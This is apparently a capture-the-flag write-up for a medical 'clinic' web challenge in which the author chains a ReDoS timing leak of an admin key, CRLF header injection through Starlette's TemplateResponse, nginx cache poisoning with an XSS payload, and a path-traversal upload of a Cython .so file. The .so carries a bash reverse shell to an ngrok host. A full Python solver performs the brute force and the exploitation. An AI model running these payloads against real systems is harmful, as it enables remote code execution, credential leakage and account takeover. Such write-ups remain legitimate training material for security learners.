We seem to have some cache-related functionality, however they are conflicting.
In Flask, we have:
@app.middleware("http")
async def add_no_cache_headers(request: Request, call_next):
response = await call_next(request)
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = '0'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return responseMeanwhile in nginx:
location /api/ {
proxy_pass http://localhost:5000/;
proxy_cache mycache;
proxy_cache_valid any 10s;
proxy_ignore_headers Set-Cookie;
proxy_cache_min_uses 1;
proxy_cache_key "$scheme$proxy_host$uri";
add_header X-Cache-Status $upstream_cache_status always;
# add_header Content-Security-Policy "default-src 'none'; script-src 'none'; style-src 'none'; img-src 'none'; connect-src 'none'; font-src 'none';" always;
}We also have an interesting /api/health endpoint. This is only accessible if you have the ADMIN_TOKEN. Both the template name and request overwrite our input, so we seemingly can't control them:
@app.get("/health")
async def health(request: Request, test: str = '{"context": {"Check": "Test"}}'):
if request.cookies.get("ADMIN_KEY", "") != environ.get("ADMIN_KEY", ""):
return Response(content="Unauthorized", status_code=401)
try:
test = json.loads(test)
except:
test = {"context": {"Check": "Test"}}
context = test | {"name": "health.html", "request": request}
if "headers" not in context:
context["headers"] = {}
context["headers"]["Content-Security-Policy"] = (
"default-src 'self'; "
"style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdn.tailwindcss.com; "
"font-src 'self' https://fonts.gstatic.com; "
"img-src 'self' data:; "
"object-src 'none'; "
"base-uri 'self'; "
"form-action 'self';"
)
return templates.TemplateResponse(**context)Inspecting Starlette's TemplateResponse class, we can see it takes an extra parameters headers:
We found a header injection that allows for control of the entire response body! I thought this was a 0-day at first, but then attempting this on a fresh Starlette version 0.52.1:
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\starlette\_exception_handler.py", line 39, in sender
await send(message)
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\starlette\middleware\errors.py", line 161, in _send
await send(message)
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 491, in send
response = h11.Response(status_code=status, headers=headers, reason=reason)
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\h11\_events.py", line 151, in __init__
self, "headers", normalize_and_validate(headers, _parsed=_parsed)
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\h11\_headers.py", line 165, in normalize_and_validate
validate(_field_name_re, name, "Illegal header name {!r}", name)
~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\h11\_util.py", line 91, in validate
raise LocalProtocolError(msg)
h11._util.LocalProtocolError: Illegal header name b'a: b\r\n\r\naaaa'
There is some validation being done (as it should be):
def normalize_and_validate(
headers: Union[Headers, HeaderTypes], _parsed: bool = False
) -> Headers:
new_headers = []
seen_content_length = None
saw_transfer_encoding = False
for name, value in headers:
# For headers coming out of the parser, we can safely skip some steps,
# because it always returns bytes and has already run these regexes
# over the data:
if not _parsed:
name = bytesify(name)
value = bytesify(value)
validate(_field_name_re, name, "Illegal header name {!r}", name)
validate(_field_value_re, value, "Illegal header value {!r}", value)
assert isinstance(name, bytes)
assert isinstance(value, bytes)I compared the two implementations, they are identical, but the behavior is different. I must be missing something:
# https://svn.tools.ietf.org/svn/wg/httpbis/specs/rfc7230.html#rule.token.separators
# token = 1*tchar
#
# tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*"
# / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~"
# / DIGIT / ALPHA
# ; any VCHAR, except delimiters
token = r"[-!#$%&'*+.^_`|~0-9a-zA-Z]+"
We can come back to this later.
Let's create our .so payload as per suinam's article on dirty arbitrary file writes
Inside the docker environment, we add a reverse shell payload:
# /app/utils/auth.py inside create_token function which gets imported by bot.py when it runs
__import__('os').system('/bin/bash -c "HOME=/home/appuser /bin/bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/10066 0>&1"')
$ cythonize -i /app/utils/auth.py
$ mv /app/utils/auth.cpython-311-x86_64-linux-gnu.so /app/utils/auth.so
$ docker cp 65d:/app/utils/auth.so ./auth.so
Successfully copied 523kB to .\auth.so
$ scp ./auth.so root@myserver.com:/var/www/html/auth.so
auth.soFor some reason, my reverse shell kept on failing. I realized it is because there was no HOME variable and bash -i was automatically trying to open /root/.bashrc. We changed the command to include HOME= beforehand. And:
ps aux
# the PID of init.sh, immediate child process of supervisord
cat /proc/8/environ
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=clinicFLAG=0xL4ugh{GG_y0u_ar3_a_g00d_pentester$!!_9209306021bfc53db53747518cf28004}LANG=C.UTF-8GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696DPYTHON_VERSION=3.11.14PYTHON_SHA256=8d3ed8ec5c88c1c95f5e558612a725450d2452813ddad5e58fdb1a53b1209b78PYPPETEER_HOME=/home/appuser/.local/share/pyppeteerHOME=/rootSUPERVISOR_ENABLED=1SUPERVISOR_PROCESS_NAME=appSUPERVISOR_GROUP_NAME=appappuser@clinic:My solver:
import httpx
from itertools import product
import json
import random
from concurrent.futures import ThreadPoolExecutor, as_completed
from string import digits
BASE_URL = "http://localhost"
BASE_URL = "http://challenges2.ctf.sd:33484"
rand_password = "".join(random.choices(digits, k=14))
password = "35657248011758"
password = "30403191501329" # bruteforced remote patient password
# password = "30508011601589" # local pass
print(f"{rand_password = }")
print(f"{password = }")
def validate_egyptian_id(national_id):
# Extract the digits as integers
digits = [int(d) for d in national_id]
# Reverse the digits since we start from the right (avoiding 0-based index problem)
digits.reverse()
# Apply Luhn's algorithm
for i in range(len(digits)):
if i % 2 == 0: # Double every second digit (0-based index after reversing)
digits[i] *= 2
if (
digits[i] > 9
): # If result > 9, subtract 9 (same effect as summing digits)
digits[i] -= 9
# Calculate the checksum
return (10 - (sum(digits) % 10)) % 10
def register(c: httpx.Client, user: dict = {}):
return c.post(
"/api/register",
json={
"name": "aelmo",
"username": "aelmo",
"national_id": "1" * 14,
"email": "aelmo@aelmo.com",
"date_of_birth": "1111-11-11",
"governrate": "Minya",
"gender": 1,
}
| user,
)
def login(c: httpx.Client, user: dict = {}):
return c.post(
"/api/login",
json={
"username": "aelmo",
"password": password,
}
| user,
)
def _login(national_id):
try:
with httpx.Client(base_url=BASE_URL, timeout=10) as client:
resp = client.post(
"/api/login", json={"username": "patient_test", "password": national_id}
)
if resp.status_code == 302 or "auth" in resp.cookies:
return (True, national_id, resp)
return (False, national_id, None)
except Exception as e:
return (False, national_id, str(e))
def update(c: httpx.Client):
return c.post(
"/api/profile",
json={
"name": "aelmo",
"username": "../../../proc/self/environ",
"email": "aelmo@aelmo.com",
},
)
def key_prefix_exists(c, known_prefix) -> tuple[bool, str]:
r = c.post(
"/api/send-message",
json={
"message": "hello",
"Illness": f"(?=.*ADMIN_KEY={known_prefix}.*)((.*)*)*!",
},
)
return r.elapsed.total_seconds() > 2
def brute_login():
found = False
tested = 0
with ThreadPoolExecutor(max_workers=20) as executor:
futures = {}
for national_id in generate_national_id():
if found:
break
future = executor.submit(_login, national_id)
futures[future] = national_id
for future in as_completed(futures):
if found:
break
success, nid, resp = future.result()
tested += 1
if tested % 100 == 0:
print(f"[*] Tested {tested} national IDs...")
if success:
print(f"[+] FOUND! National ID: {nid}")
found = True
return nid
print(f"[-] Not found after {tested} attempts")
return None
# dob: 2004-03-19
# kafr-el-sheikh
# female
digits = [str(x) for x in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]]
even = [str(x) for x in [0, 2, 4, 6, 8]]
def generate_national_id():
for it in product(["304031915"], digits, digits, digits, even):
candidate = "".join(it)
check = validate_egyptian_id(candidate)
yield candidate + str(check)
# result = brute_login()
# if result:
# print(f"\n[+] Valid credentials: patient_test:{result}")
c = httpx.Client(base_url=BASE_URL, timeout=30)
try:
print("[*] login")
r = login(c, {"username": "patient_test"})
assert r.status_code == 302, r.text
assert c.cookies.get("auth") is not None
print("[*] updating")
r = update(c)
assert r.json()["status"] == "success", r.text
print("[+] update complete")
except Exception:
print("[!] couldnt find patient_test, assuming it was updated")
r = login(c, {"username": "../../../proc/self/environ"})
assert r.status_code == 302, r.text
assert c.cookies.get("auth") is not None
r = c.get("/api/userdata")
print(r.text)
print("[+] login complete")
admin_key = "b0c9070a5bce6b3a7af5fe940e4b874a"
# admin_key = "873f7da2070816a04c3627418a42c30c" # local
if not admin_key:
print("[*] leaking admin_key..")
while len(admin_key) < 32:
for char in "0123456789abcdef":
if key_prefix_exists(c, admin_key + char):
admin_key = admin_key + char
print("\b" * (len(admin_key) - 1) + admin_key, end="", flush=True)
break
print()
assert len(admin_key) == 32
print(f"[+] leaked {admin_key = }")
print("[*] poisoning /api/health cache via header injection")
xss = """<script>fetch("/api/upload-document",{method:"POST",body:JSON.stringify({"file_url":"\\u00a0http://myserver.com/auth.so","filename":"../../../app/utils/auth.so"}),headers:{"content-type":"application/json"},credentials:"include"})</script>"""
template_object = {
"context": {"Check": ""},
"headers": {"content-type: text/html\r\ncache-control: max-age=10\r\n\r\n": xss},
}
r = c.get(
"/api/health",
params={"test": json.dumps(template_object)},
cookies={"ADMIN_KEY": admin_key},
)
ng
r = c.get("/api/health")
assert r.headers.get("x-cache-status") == "HIT"
print("--- headers ---")
for k in r.headers:
print(f"{k}: {r.headers[k]}")
print("--- endheaders ---")
print("--- body ---")
print(r.text)
print("--- endbody ---")
# print("[*] trigger poisoned cache to download malicious .so")
r = c.get("/api/bot")
# print('[*] force use of .so via to')
r = c.get("/api/bot")Great article about ReDoS:
0xL4ugh{GG_y0u_ar3_a_g00d_pentester$!!_]